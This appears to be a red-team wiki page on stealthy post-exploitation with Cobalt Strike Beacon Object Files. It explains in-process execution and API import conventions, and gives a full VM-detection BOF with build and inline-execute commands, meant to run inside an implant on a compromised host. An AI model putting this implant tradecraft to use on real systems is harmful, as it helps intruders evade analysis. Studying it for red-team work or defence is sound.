🛠️ Stealth with C2
This technique can only be used after initial access to the target has been obtained.
This is a work-in-progress. It's indicated with the 🛠️ emoji in the page name or in the category name. Wanna help? Please reach out to me: @_nwodtuhs
Once you have a shell on the victim, one of the most discreet ways to execute code is through an object file: instead of spawning a sub-process, the implant allocates memory inside its own process, runs the code there and frees that memory afterwards, so the process returns to its original footprint. The flip side is that the object file runs inside the Beacon process itself, so a crash in the BOF kills the whole implant.
Here is an example of how to launch the BOF (Beacon Object File) once compiled. The source code is available here; its goal is to check whether the implant is running inside a virtual machine.
For example, if you need the
Look up the function in the Windows documentation (in our example https://learn.microsoft.com/en-us/windows/win32/api/winreg/nf-winreg-regclosekey) to get its return type and argument list.
In our case:
[in] HKEY hKey
Then get the name of the DLL that exports the function (listed in the Requirements table at the bottom of the documentation page); in our case it is Advapi32.dll, which gives the ADVAPI32$ prefix used below.
We have to declare it like this (library name, then a dollar sign, then the function name):
DECLSPEC_IMPORT LSTATUS WINAPI <lib>$<Function>(<Args List>);
In our case, this gives:
DECLSPEC_IMPORT LSTATUS WINAPI ADVAPI32$RegCloseKey(HKEY);
The function is then called under that prefixed name in the BOF code:
It is also possible to load the library at runtime and then resolve and call the function using methods like
Below is an example of how to use this approach:
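The following is an added example written for this page; it is neither the source the author links to nor Cobalt Strike's own code. It serves both approaches above: `RegOpenKeyExA` and `RegQueryValueExA` are declared with the `LIB$Function` import convention, while `RegCloseKey` is resolved at runtime through `KERNEL32$LoadLibraryA` and `KERNEL32$GetProcAddress`. The VM check itself is an assumption of mine: it reads `HKLM\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer` and looks for hypervisor vendor markers, which is a heuristic and easily spoofed. The `#else` branch (the `fake_`/`g_` names and the sample manufacturer string) is a constructed host-side test double so the logic can be compiled and checked off-target; it is never part of a Beacon build. The file name `vmcheck.c` is also mine.

```c
/*
 * vmcheck.c: added example BOF (not the page's own source). RegOpenKeyExA and
 * RegQueryValueExA come through LIB$Function imports; RegCloseKey is resolved
 * at runtime with LoadLibrary + GetProcAddress. Reads
 * HKLM\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer (assumed heuristic).
 *
 *   build : x86_64-w64-mingw32-gcc -c vmcheck.c -o vmcheck.x64.o
 *   run   : inline-execute /path/to/vmcheck.x64.o
 *
 * The #else branch holds constructed test doubles for off-target checks only.
 */
#include <stddef.h>

#ifdef _WIN32
#include <windows.h>
/* Prototypes copied from the Microsoft docs and prefixed with the exporting DLL. */
DECLSPEC_IMPORT HMODULE WINAPI KERNEL32$LoadLibraryA(LPCSTR);
DECLSPEC_IMPORT FARPROC WINAPI KERNEL32$GetProcAddress(HMODULE, LPCSTR);
DECLSPEC_IMPORT LSTATUS WINAPI ADVAPI32$RegOpenKeyExA(HKEY, LPCSTR, DWORD, REGSAM, PHKEY);
DECLSPEC_IMPORT LSTATUS WINAPI ADVAPI32$RegQueryValueExA(HKEY, LPCSTR, LPDWORD, LPDWORD, LPBYTE, LPDWORD);
DECLSPEC_IMPORT void BeaconPrintf(int type, char *fmt, ...);   /* normally from beacon.h */
#define CALLBACK_OUTPUT 0x0
#define CALLBACK_ERROR  0x0d
#else
/* ---- constructed test doubles, NOT the Windows API: off-target checks only ---- */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>
#define WINAPI
typedef void *HKEY, *HMODULE;  typedef HKEY *PHKEY;  typedef const char *LPCSTR;
typedef unsigned long DWORD, *LPDWORD, REGSAM;  typedef unsigned char *LPBYTE;
typedef long LSTATUS;  typedef void (*FARPROC)(void);
#define HKEY_LOCAL_MACHINE ((HKEY)(size_t)0x80000002)
#define KEY_READ 0x20019
#define ERROR_SUCCESS 0L
#define CALLBACK_OUTPUT 0x0
#define CALLBACK_ERROR  0x0d
static const char *g_fake_manufacturer = "VMware, Inc.";  /* constructed sample value */
static int g_open_count = 0, g_close_count = 0;           /* handle-leak accounting */
static LSTATUS WINAPI fake_RegCloseKey(HKEY h) { (void)h; g_close_count++; return ERROR_SUCCESS; }
static HMODULE KERNEL32$LoadLibraryA(LPCSTR n) { (void)n; return (HMODULE)(size_t)0x4000; }
static FARPROC KERNEL32$GetProcAddress(HMODULE m, LPCSTR n) {
    (void)m; return strcmp(n, "RegCloseKey") == 0 ? (FARPROC)fake_RegCloseKey : NULL;
}
static LSTATUS ADVAPI32$RegOpenKeyExA(HKEY h, LPCSTR s, DWORD o, REGSAM a, PHKEY out) {
    (void)h; (void)s; (void)o; (void)a; *out = (HKEY)(size_t)0x1234; g_open_count++; return ERROR_SUCCESS;
}
static LSTATUS ADVAPI32$RegQueryValueExA(HKEY h, LPCSTR n, LPDWORD r, LPDWORD t, LPBYTE d, LPDWORD cb) {
    (void)h; (void)n; (void)r; (void)t;
    size_t len = strlen(g_fake_manufacturer) + 1;            /* REG_SZ size includes the NUL */
    if (*cb < len) return 234L;                               /* ERROR_MORE_DATA */
    memcpy(d, g_fake_manufacturer, len); *cb = (DWORD)len; return ERROR_SUCCESS;
}
static void BeaconPrintf(int type, char *fmt, ...) {
    va_list ap; va_start(ap, fmt); (void)type; vprintf(fmt, ap); va_end(ap); putchar('\n');
}
#endif

typedef LSTATUS (WINAPI *RegCloseKey_t)(HKEY);

/* BOFs cannot link the CRT, so string helpers are hand-rolled rather than imported. */
static char to_lower_ascii(char c) { return (c >= 'A' && c <= 'Z') ? (char)(c + 32) : c; }
static int contains_nocase(const char *hay, size_t n, const char *needle) {
    size_t m = 0;
    while (needle[m]) m++;
    for (size_t i = 0; m && i + m <= n; i++) {
        size_t j = 0;
        while (j < m && to_lower_ascii(hay[i + j]) == to_lower_ascii(needle[j])) j++;
        if (j == m) return 1;
    }
    return 0;
}

/* 1 if the manufacturer string contains a known hypervisor vendor marker, else 0. */
int looks_like_vm(const char *s, size_t n) {
    static const char *markers[] = { "vmware", "virtualbox", "innotek", "qemu", "xen", "parallels" };
    for (size_t i = 0; i < sizeof markers / sizeof markers[0]; i++)
        if (contains_nocase(s, n, markers[i])) return 1;
    return 0;
}

/* Opens the BIOS key, reads SystemManufacturer and closes the key on every path.
 * Returns 1 (VM marker), 0 (no marker) or -1 (resolution or registry failure). */
int check_vm(void) {
    char buf[256];
    DWORD cb = sizeof buf - 1;
    HKEY key = NULL;
    /* RegCloseKey is resolved at runtime; the other two calls use the import declarations. */
    HMODULE adv = KERNEL32$LoadLibraryA("advapi32.dll");
    RegCloseKey_t pRegCloseKey = adv ? (RegCloseKey_t)KERNEL32$GetProcAddress(adv, "RegCloseKey") : NULL;
    if (!pRegCloseKey) return -1;
    if (ADVAPI32$RegOpenKeyExA(HKEY_LOCAL_MACHINE, "HARDWARE\\DESCRIPTION\\System\\BIOS",
                               0, KEY_READ, &key) != ERROR_SUCCESS) return -1;
    LSTATUS rc = ADVAPI32$RegQueryValueExA(key, "SystemManufacturer", NULL, NULL, (LPBYTE)buf, &cb);
    pRegCloseKey(key);                     /* release the handle before any early return */
    if (rc != ERROR_SUCCESS) return -1;
    buf[cb] = '\0';                        /* REG_SZ data is not guaranteed to be terminated */
    return looks_like_vm(buf, cb);
}

/* BOF entry point invoked by inline-execute. */
void go(char *args, int len) {
    (void)args; (void)len;
    int r = check_vm();
    if (r < 0) BeaconPrintf(CALLBACK_ERROR, "vmcheck: registry lookup failed");
    else       BeaconPrintf(CALLBACK_OUTPUT, "vmcheck: hypervisor marker %s", r ? "found" : "not found");
}
```

Two details are worth keeping when writing your own BOFs: the object file is compiled with `-c` only and never linked, so every external call must either be a `LIB$Function` import resolved by Beacon's loader or be fetched through `GetProcAddress` as shown, and nothing from the C runtime (`strlen`, `strstr`, `tolower`) is available unless it is imported the same way; and every handle opened must be closed on every return path, because a leak persists for the lifetime of the Beacon process rather than a short-lived child.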
More information at this URL: https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/topics/beacon-object-files_main.htm.